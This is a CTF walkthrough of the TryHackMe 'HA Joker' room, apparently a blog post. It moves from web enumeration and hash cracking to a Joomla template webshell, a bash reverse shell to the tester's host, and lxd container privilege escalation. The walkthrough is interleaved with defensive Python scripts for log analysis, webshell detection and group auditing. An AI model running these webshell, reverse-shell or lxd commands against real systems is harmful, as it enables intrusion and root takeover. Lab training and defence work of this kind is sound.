TryHackMe : HA Joker CTF

#$ubh@nk@r
6 min readJun 19, 2023


Intro:

This is a medium-level CTF challenge. It starts with basic enumeration and ends with ‘lxd’ privilege escalation. For this room you need to know the basic usage of the tools involved. You will also learn how to get RCE through the Joomla administrator panel.

Nmap Scan:

As usual, I start with a basic nmap scan of the target.

Tip : nmap -sVC -T4 <ip> -vv

The scan showed 3 open ports: 22, 80 and 8080.

Web Exploitation:

I started by enumerating the web server on port 80, because port 8080 asks for authorization that I did not have yet.

On port 80 there is only an image of the Joker and nothing else. I also checked the page source, but found nothing there either.

So I started with a regular ‘Gobuster’ scan on port 80. I found an interesting page called ‘phpinfo.php’; exposing it is a vulnerability in itself, since it reveals sensitive configuration details and should not be reachable by regular users. Here, though, it gave me nothing to go further with.

So I ran Gobuster again, this time searching for files with common extensions (like php, txt, js), and found a file called secret.txt.

Tip : gobuster dir -u http://<ip>:<port> -w <path_of_wordlist> -x txt,php

I visited the page and found a conversation between Joker and Batman.

I guessed that joker or batman could be the username for the page on port 8080. Batman couldn’t hit me, but Joker hit me with his password. Yahhhh!!

The password is : h****h

Tip : Port 8080 [joker : h****h]

After entering the credentials we get a page running Joomla CMS. Awesome!!!

I started a ‘nikto’ scan to look for vulnerabilities; after all, it is a CMS and may be exploitable.

Tip : nikto -h http://<ip>:<port>/ -id uname:pass

After some time I got some interesting results: robots.txt, /administrator and also a backup.zip file. So let’s start. In the ‘administrator’ directory there is a Joomla login page, but I had no credentials for it. That hit me harder than the Joker did :)
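From the defender’s side, the Gobuster and nikto runs above leave a very recognisable trace in the web server’s access log: a burst of 404s from one address, followed by 200s on files like phpinfo.php, secret.txt and backup.zip that should never be served. The script below is an added example, not part of the original write-up, that flags that pattern in combined-format access logs. The log lines are constructed sample data, and the sensitive-path list and thresholds are assumptions to tune for your own host.

```python
"""Flag web-scanner behaviour in Apache/nginx combined-format access logs.

Added example for this write-up, not the author's code. Log lines are
constructed sample data; SENSITIVE_PATHS and the thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

# Combined log format: IP ident user [timestamp] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Paths that should never answer 200 on a production Joomla host (assumption).
SENSITIVE_PATHS = {"/phpinfo.php", "/backup.zip", "/secret.txt", "/administrator/"}

# Constructed sample log: 10.0.0.5 is a normal visitor, 10.0.0.9 is scanning.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Jun/2023:10:00:01 +0000] "GET / HTTP/1.1" 200 512
10.0.0.5 - - [19/Jun/2023:10:00:02 +0000] "GET /images/joker.png HTTP/1.1" 200 40231
10.0.0.9 - - [19/Jun/2023:10:01:00 +0000] "GET /admin HTTP/1.1" 404 196
10.0.0.9 - - [19/Jun/2023:10:01:00 +0000] "GET /login HTTP/1.1" 404 196
10.0.0.9 - - [19/Jun/2023:10:01:01 +0000] "GET /backup HTTP/1.1" 404 196
10.0.0.9 - - [19/Jun/2023:10:01:01 +0000] "GET /test.php HTTP/1.1" 404 196
10.0.0.9 - - [19/Jun/2023:10:01:02 +0000] "GET /phpinfo.php HTTP/1.1" 200 68211
10.0.0.9 - - [19/Jun/2023:10:01:02 +0000] "GET /secret.txt HTTP/1.1" 200 300
10.0.0.9 - - [19/Jun/2023:10:01:03 +0000] "GET /backup.zip HTTP/1.1" 200 904211
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def analyze(log_text, not_found_threshold=4, window_seconds=60):
    """Return {ip: [reasons]} for every client that looks like a scanner."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        # Sensitive files that were actually served (status 200), not just probed.
        served = sorted({r["path"] for r in recs
                         if r["path"] in SENSITIVE_PATHS and r["status"] == 200})
        # Sliding window over 404 timestamps: path brute-forcing comes in bursts.
        nf_times = [r["ts"] for r in recs if r["status"] == 404]
        burst, j = 0, 0
        for i, t in enumerate(nf_times):
            while (t - nf_times[j]).total_seconds() > window_seconds:
                j += 1
            burst = max(burst, i - j + 1)
        reasons = []
        if burst >= not_found_threshold:
            reasons.append(f"{burst} 404s within {window_seconds}s (path brute-force)")
        if served:
            reasons.append("sensitive paths served with 200: " + ", ".join(served))
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in analyze(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

Run against a real access log by passing the file contents to analyze(); the 404 burst alone is a cheap early warning, and any entry in the second reason list is a finding to fix on the server (remove phpinfo.php, keep backups out of the web root, restrict /administrator) rather than just a scan to block.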

[Screenshot: Admin Panel]

But there is also the backup.zip file. I downloaded it to my machine, but it needs a password to unzip. Ohhhhhh!!!

So I used ‘zip2john’ (you could also use ‘fcrackzip’). I saved the hash to a file and cracked it with ‘JohnTheRipper’.

I had already cracked the hash, as you can see below.

[Screenshot: Hash Crack]

The zip file’s password is : h****h. I used it to unzip the backup, which gave me a ‘db’ directory containing a database dump called ‘joomladb.sql’.

In the database dump I found a username and a password hash, which may well be the credentials for the Joomla login page :)

[Screenshot: Hashes]

I saved the hash in a text file and cracked it using ‘John’.

[Screenshot: Hash Crack]

I had already cracked it.

Tip : [ admin : a******4 ] [ Joomla Admin Login ]

Admin Panel → www-data :

I used the credentials and landed in the Joomla admin panel. Yesss!!!! Now I go for a reverse shell. I went to the ‘Extensions’ tab, then ‘Templates’, and then ‘Templates’ again.

Here I found 2 templates: Beez3 and Protostar.

I chose the Beez3 template, selected the ‘error.php’ file, replaced its content with a PHP system() call and saved it.

Tip : <?php system($_GET['cmd']); ?>

With this I get RCE on the machine. Open ‘/templates/beez3/error.php’ in the browser (I would suggest using ‘BurpSuite’) and pass the command in the ‘cmd’ parameter of the URL.

Tip : /templates/beez3/error.php?cmd=id

Here I got uid = www-data. Yupp!!!!!!
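The error.php edit above is exactly what a file-integrity check on the Joomla templates directory should catch: a known file whose hash no longer matches the install baseline, and PHP source in which request input flows into system() or a similar call. The following is an added example (mine, not the author’s or Joomla’s code); the directory layout, the baseline and the file contents are constructed for the demo, and the list of dangerous functions is a common starting point rather than a complete one.

```python
"""Detect tampered or webshell-like PHP files under a Joomla templates directory.

Added example for this write-up, not the author's or Joomla's code. The tree,
the baseline and the file contents built in run_demo() are constructed.
"""
import hashlib
import os
import re
import tempfile

# PHP functions that run commands or code (common list, assumed not exhaustive).
DANGEROUS_CALLS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(",
    re.IGNORECASE,
)
# Request-controlled input reaching such a call is the classic one-line webshell.
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")


def scan_php_source(src):
    """Return the reasons this PHP source looks suspicious (empty list if clean)."""
    reasons = []
    calls = {m.group(1).lower() for m in DANGEROUS_CALLS.finditer(src)}
    if calls:
        reasons.append("dangerous call(s): " + ", ".join(sorted(calls)))
        if REQUEST_INPUT.search(src):
            reasons.append("request input reaches code/command execution")
    return reasons


def sha256_file(path):
    """SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root, baseline):
    """baseline maps relative path -> sha256 of the known-good file.
    Returns {relative_path: [reasons]} for every PHP file that needs a look."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            reasons = []
            if rel not in baseline:
                reasons.append("file not in baseline")
            elif baseline[rel] != sha256_file(full):
                reasons.append("content differs from baseline")
            with open(full, "r", encoding="utf-8", errors="replace") as f:
                reasons.extend(scan_php_source(f.read()))
            if reasons:
                findings[rel] = reasons
    return findings


# Constructed stand-ins for a clean template file and the edit from the write-up.
CLEAN_ERROR_PHP = "<?php\ndefined('_JEXEC') or die;\necho '<h1>Error</h1>';\n"
TAMPERED_ERROR_PHP = "<?php system($_GET['cmd']); ?>\n"


def run_demo():
    """Baseline a throwaway templates tree, tamper with it, rescan.
    Returns (findings_before, findings_after)."""
    with tempfile.TemporaryDirectory() as root:
        beez = os.path.join(root, "beez3")
        os.makedirs(beez)
        error_php = os.path.join(beez, "error.php")
        index_php = os.path.join(beez, "index.php")
        with open(error_php, "w") as f:
            f.write(CLEAN_ERROR_PHP)
        with open(index_php, "w") as f:
            f.write("<?php\ndefined('_JEXEC') or die;\n")
        # Baseline taken from the known-good install.
        baseline = {"beez3/error.php": sha256_file(error_php),
                    "beez3/index.php": sha256_file(index_php)}
        before = scan_tree(root, baseline)
        # Simulate the template edit and an extra file dropped next to it.
        with open(error_php, "w") as f:
            f.write(TAMPERED_ERROR_PHP)
        with open(os.path.join(beez, "x.php"), "w") as f:
            f.write("<?php echo 'dropped'; ?>\n")
        after = scan_tree(root, baseline)
        return before, after


if __name__ == "__main__":
    before, after = run_demo()
    print("clean install:", before)
    for rel, reasons in after.items():
        print(rel, "->", "; ".join(reasons))
```

In practice the baseline comes from the package or a fresh install of the same Joomla version, and the scan runs from cron against the live web root; the hash check catches the edit even when the injected code is obfuscated past the regexes.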

Next I replaced the ‘id’ command with a reverse shell command and URL-encoded it.

Tip : /bin/bash -c 'bash -i >& /dev/tcp/<tun0_ip>/<port> 0>&1'

Then I set up my netcat listener and got a reverse shell as www-data.

LXD Privesc :

I typed the ‘id’ command and found that www-data is a member of a group called ‘lxd’. So it is time for some LXD privesc.

You have to download an Alpine image builder (link below) on your machine, build the image and send the *.tar.gz file to the victim machine. In my case it went like this.

Tip : https://www.exploit-db.com/exploits/46978

Tip : git clone <URL> , cd lxd-alpine-builder , ./build-alpine [ command ]

You will get a *.tar.gz file. I sent it to the victim machine using a python3 HTTP server.

Download it into the /dev/shm directory on the victim machine, then run the following command to import it. You will get an Alpine image.

Tip : lxc image import ./*.tar.gz --alias myimage , lxc image list [ command ]

Now we have reached the final stage. Just a few commands to get into the LXD container. Use the following:

1> lxc init myimage ignite -c security.privileged=true

2> lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

3> lxc start ignite

4> lxc exec ignite /bin/sh

This gives a root shell (#) inside the LXD container. How amazing!

Since we mounted the host filesystem at ‘/mnt/root’, go there. You will find the entire host filesystem. From there go into ‘root’, where you can find ‘final.txt’.
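The whole privesc chain hinges on one thing a defender can audit in seconds: a service account sitting in the lxd group, which is root-equivalent because a member can mount the host filesystem into a privileged container exactly as shown above. The script below is an added example, not part of the write-up, that parses /etc/passwd and /etc/group content and reports every non-root account whose effective groups include a root-equivalent one. The passwd/group contents are constructed samples and the group list is an assumption to tune per host.

```python
"""Audit /etc/passwd and /etc/group for accounts in root-equivalent groups.

Added example for this write-up, not the author's code. SAMPLE_PASSWD and
SAMPLE_GROUP are constructed; ROOT_EQUIVALENT_GROUPS is an assumption.
"""

# Membership here lets a user become root without any exploit: lxd and docker
# by mounting the host filesystem into a privileged container, disk via raw
# block-device access, sudo/wheel by policy. Assumption: tune per host.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "disk", "sudo", "wheel"}

# Constructed sample: www-data has been added to lxd, mirroring the room.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
joker:x:1000:1000:joker:/home/joker:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
"""

SAMPLE_GROUP = """\
root:x:0:
www-data:x:33:
sudo:x:27:joker
joker:x:1000:
lxd:x:115:www-data,joker
docker:x:998:
"""


def parse_passwd(text):
    """Return {user: primary_gid} from passwd-format text."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, _uid, gid, *_rest = line.split(":")
        users[name] = int(gid)
    return users


def parse_group(text):
    """Return ({group: gid}, {group: set of supplementary members})."""
    gids, members = {}, {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, mem = line.split(":", 3)
        gids[name] = int(gid)
        members[name] = {m for m in mem.split(",") if m}
    return gids, members


def effective_groups(user, passwd_text, group_text):
    """All groups a user belongs to: primary group via the passwd gid, plus
    every group that lists the user as a supplementary member (what `id` shows)."""
    users = parse_passwd(passwd_text)
    gids, members = parse_group(group_text)
    gid_to_name = {gid: name for name, gid in gids.items()}
    groups = {name for name, mem in members.items() if user in mem}
    if user in users and users[user] in gid_to_name:
        groups.add(gid_to_name[users[user]])
    return groups


def audit(passwd_text, group_text):
    """Return {user: sorted root-equivalent groups} for every affected non-root user."""
    findings = {}
    for user in parse_passwd(passwd_text):
        if user == "root":
            continue
        risky = sorted(effective_groups(user, passwd_text, group_text)
                       & ROOT_EQUIVALENT_GROUPS)
        if risky:
            findings[user] = risky
    return findings


if __name__ == "__main__":
    for user, groups in audit(SAMPLE_PASSWD, SAMPLE_GROUP).items():
        print(f"{user}: member of {', '.join(groups)} (root-equivalent)")
```

On a real host, read /etc/passwd and /etc/group and pass their contents in; a web server account like www-data appearing in the output is the finding to fix (remove it from the group, or do not run LXD on a web-facing box at all), and that one line is what made this whole box fall.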

And at last we hit the ‘JOKER’.

THANK YOU FOR READING!

Happy Hacking~


Written by #$ubh@nk@r

CyberSecurity Learner, CTF Player, Noob Bug Hunter https://starlox0.github.io/
